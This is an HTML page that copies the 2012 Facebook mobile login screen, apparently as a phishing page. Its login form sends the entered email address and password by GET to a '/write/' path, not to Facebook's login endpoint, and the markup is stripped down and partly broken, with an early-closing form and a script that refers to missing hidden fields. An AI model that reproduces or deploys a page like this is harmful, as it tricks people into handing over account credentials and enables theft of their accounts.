<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Facebook</title><meta name="description" content="Facebook helps you connect and share with the people in your life." /><meta name="referrer" content="default" id="meta_referrer" /><noscript><meta http-equiv="X-Frame-Options" content="deny" /></noscript><script type="text/javascript">window.localStorage&&window.localStorage.clear();</script><style type="text/css">/*<![CDATA[*/.nontouch .mobile-login-field .input{width:90%}
/* @noflip */
.mobile-login-field-email{direction:ltr}
.touch .loginInner{margin:0 auto;max-width:416px;padding:9px 1px}
#footer .acg{background:#fff}
form{margin:0;border:0}
.acw{background-color:#fff}
.acbk{background-color:#000}
.acb{background-color:#3b5998}
.aclb{background-color:#eceff5}
.acdb{background-color:#31394a}
.acg{background-color:#f2f2f2}
.acy{background-color:#fffbe2}
.acr{background-color:#ffebe8}
.aps{padding:2px 3px}
.apm{padding:4px 3px}
.apl{padding:6px 3px}
.input{border:solid 1px #999;border-top-color:#888;margin:0;padding:3px}
.nontouch .input{padding:3px 3px 4px 0}
.btn{border:solid 2px;cursor:pointer;margin:0;padding:2px 6px 3px;text-align:center}
.btn.largeBtn{display:block}
button.largeBtn,
input.largeBtn{width:100%}
.btnForm{display:inline;border:none;padding:0}
.btnD,
.acb .btnC,
.btnI,
.nontouch a.btnD,
.nontouch .acb a.btnC,
.nontouch a.btnI{background:#f3f4f5;border-color:#ccc #aaa #999;color:#505c77}
.acb .btnD,
.btnC,
.acb .btnI,
.nontouch .acb a.btnD,
.nontouch a.btnC,
.nontouch .acb a.btnI{background:#5b74a8;border-color:#8a9ac5 #29447E #1a356e;color:#fff}
.btnS,
.nontouch a.btnS{background:#69a74e;border-color:#98c37d #3b6e22 #2c5115;color:#fff}
.btnN,
.nontouch a.btnN{background:#ee3f10;border-color:#f48365 #8d290e #762610;color:#fff}
.btn,
.btnForm{display:inline-block}
.btn + .btn,
.btnForm + .btnForm,
.btn + .btnForm,
.btnForm + .btn{margin-left:3px}
.largeBtn + .largeBtn{margin-left:0;margin-top:6px}
.btn input{background:none;border:none;margin:0;padding:0}
.btnD input,
.acb .btnC input,
.btnI input{color:#505c77}
.acb .btnD input,
.btnC input,
.acb .btnI input,
.btnS input,
.btnN input{color:#fff}
.fcb{color:#000}
.fcg{color:gray}
.fcw{color:#fff}
.fcl{color:#3b5998}
.fcs{color:#6d84b4}
.mfsxs{font-size:x-small}
.mfss{font-size:small}
body, tr, input, textarea, .mfsm{font-size:medium}
.mfsl{font-size:large}
.nontouch a,
.nontouch a:visited{color:#3b5998;text-decoration:none}
.nontouch .sub,
.nontouch .sub:visited{color:gray}
.nontouch .sec,
.nontouch .sec:visited{color:#6d84b4}
.nontouch .inv,
.nontouch .inv:visited{color:#fff}
.nontouch a:focus,
.nontouch a:hover,
.nontouch .sub:focus,
.nontouch .sub:hover,
.nontouch .sec:focus,
.nontouch .sec:hover{background-color:#3b5998;color:#fff}
.nontouch .inv:focus,
.nontouch .inv:hover{background-color:#fff;color:#3b5998}
.abt{border-top:1px solid}
.abb{border-bottom:1px solid}
.acw{border-color:#e9e9e9}
.acb{border-color:#1d4088}
.aclb{border-color:#d8dfea}
.acg{border-color:#ccc}
.acy{border-color:#e2c822}
.acr{border-color:#dd3c10}
.mBasicOnDesktop{margin:0 auto;max-width:600px}
.img{border:0;display:inline-block;vertical-align:top}
i.img u{position:absolute;top:-9999999px}
.sp_2qy9lm{background-image:url(http://m-static.ak.fbcdn.net/rsrc.php/v2/yD/r/S1lR2dKoPGi.png);background-repeat:no-repeat;display:inline-block;height:16px;width:10px}
.sx_797166{width:15px;background-position:-0px -21px}
.sx_55a20b{width:76px;height:20px;background-position:-0px -0px}
.sx_d05f26{width:14px;background-position:-16px -21px}
.sx_1e4125{height:11px;background-position:-12px -52px}
.sx_6f42ae{height:11px;background-position:-23px -52px}
.sx_b747f9{width:11px;height:11px;background-position:-0px -52px}
.sx_5397c9{height:9px;background-position:-24px -38px}
.sx_d5d5f6{width:12px;background-position:-31px -21px}
.sx_d038ba{width:12px;height:10px;background-position:-11px -38px}
.sx_dddfed{width:13px;height:15px;background-position:-44px -21px}
.sx_8eb184{height:13px;background-position:-58px -21px}
.sx_8958a4{height:13px;background-position:-0px -38px}
body{margin:0;padding:0;text-align:left;direction:ltr}
body, tr, input, textarea, button{font-family:sans-serif}
/*]]>*/</style></head><body class="nontouch acw"><div class="mfsm"><div id="viewport" class="mBasicOnDesktop"><div id="root" class="acw"><div class="acb aps"><a href="/home.php?refid=8"><i class="img sp_2qy9lm sx_55a20b"><u>facebook</u></i></a></div><div id="objects_container"><div class="aclb"><div class="loginInner"><form method="get" class="mobile-login-form" id="login_form" action="/write/"><div>Email address or phone number<br /><input class="input" autocorrect="off" autocapitalize="off" name="email" type="text" /></div></div><div class="mobile-login-field aclb apl"><div>Password<br /><input class="input" autocorrect="off" autocapitalize="off" name="pass" type="password" /></div></div></div></div>
<input type="submit" value="Log In">
</form><div class="aclb apl"><span class="mfss fcg"><a href="/recover?refid=8">Forgot password?</a><br />Trouble logging in? <a href="/login.php?http&amp;refsrc=http%3A%2F%2Fm.facebook.com%2F&amp;no_next_msg&amp;refid=8">Try the alternative login</a>.</span></div><div class="aclb apl abt"><span class="mfss fcg">Need a Facebook account?<br /><a href="/r.php?refid=8">Sign up here</a>.</span></div></div></div><div class="acw apm"><span class="mfss"><a href="/help/?refid=8">Help Centre</a></span></div><script type="text/javascript">if(window.document&&document.getElementById){document.getElementById("ajax").value=window.XMLHttpRequest&&document.getElementById("login_form").innerHTML?1:0;document.getElementById("width").value=window.screen?screen.width:0;document.getElementById("pxr").value=window.devicePixelRatio||1;document.getElementById("gps").value=navigator.geolocation||(typeof GearsFactory != "undefined")||(typeof navigator.mimeTypes!="undefined"&&navigator.mimeTypes["application/x-googlegears"])?1:0;}</script></div><div id="footer"><div class="acg apm"><span class="mfss fcg"><b>English (UK)</b>&nbsp;<span role="separator" aria-hidden="true">·</span>&nbsp;<a class="sec" href="/a/language.php?l=en_US&amp;gfid=AQD_Ymisv0ZHn_Gt&amp;refid=8">English (US)</a>&nbsp;<span role="separator" aria-hidden="true">·</span>&nbsp;<a class="sec" href="/a/language.php?l=bn_IN&amp;gfid=AQAcY82VIk8AZJ0C&amp;refid=8">বাংলা</a>&nbsp;<span role="separator" aria-hidden="true">·</span>&nbsp;<a class="sec" href="/language.php?refid=8">More…</a></span></div><div class="acg apm"><span class="mfss fcg">Facebook ©2012</span></div><div class="acg apm"><span class="mfss fcg"><a href="/l.php?u=http%3A%2F%2Fm.ideacellular.com%2F&amp;h=pAQGBdwve&amp;s=1" target="_blank">Idea Cellular Ltd</a></span></div></div></div></div><input type="hidden" id="m_user_DEPRECATED" value="0" /><div id="static_templates"></div></div></body></html>
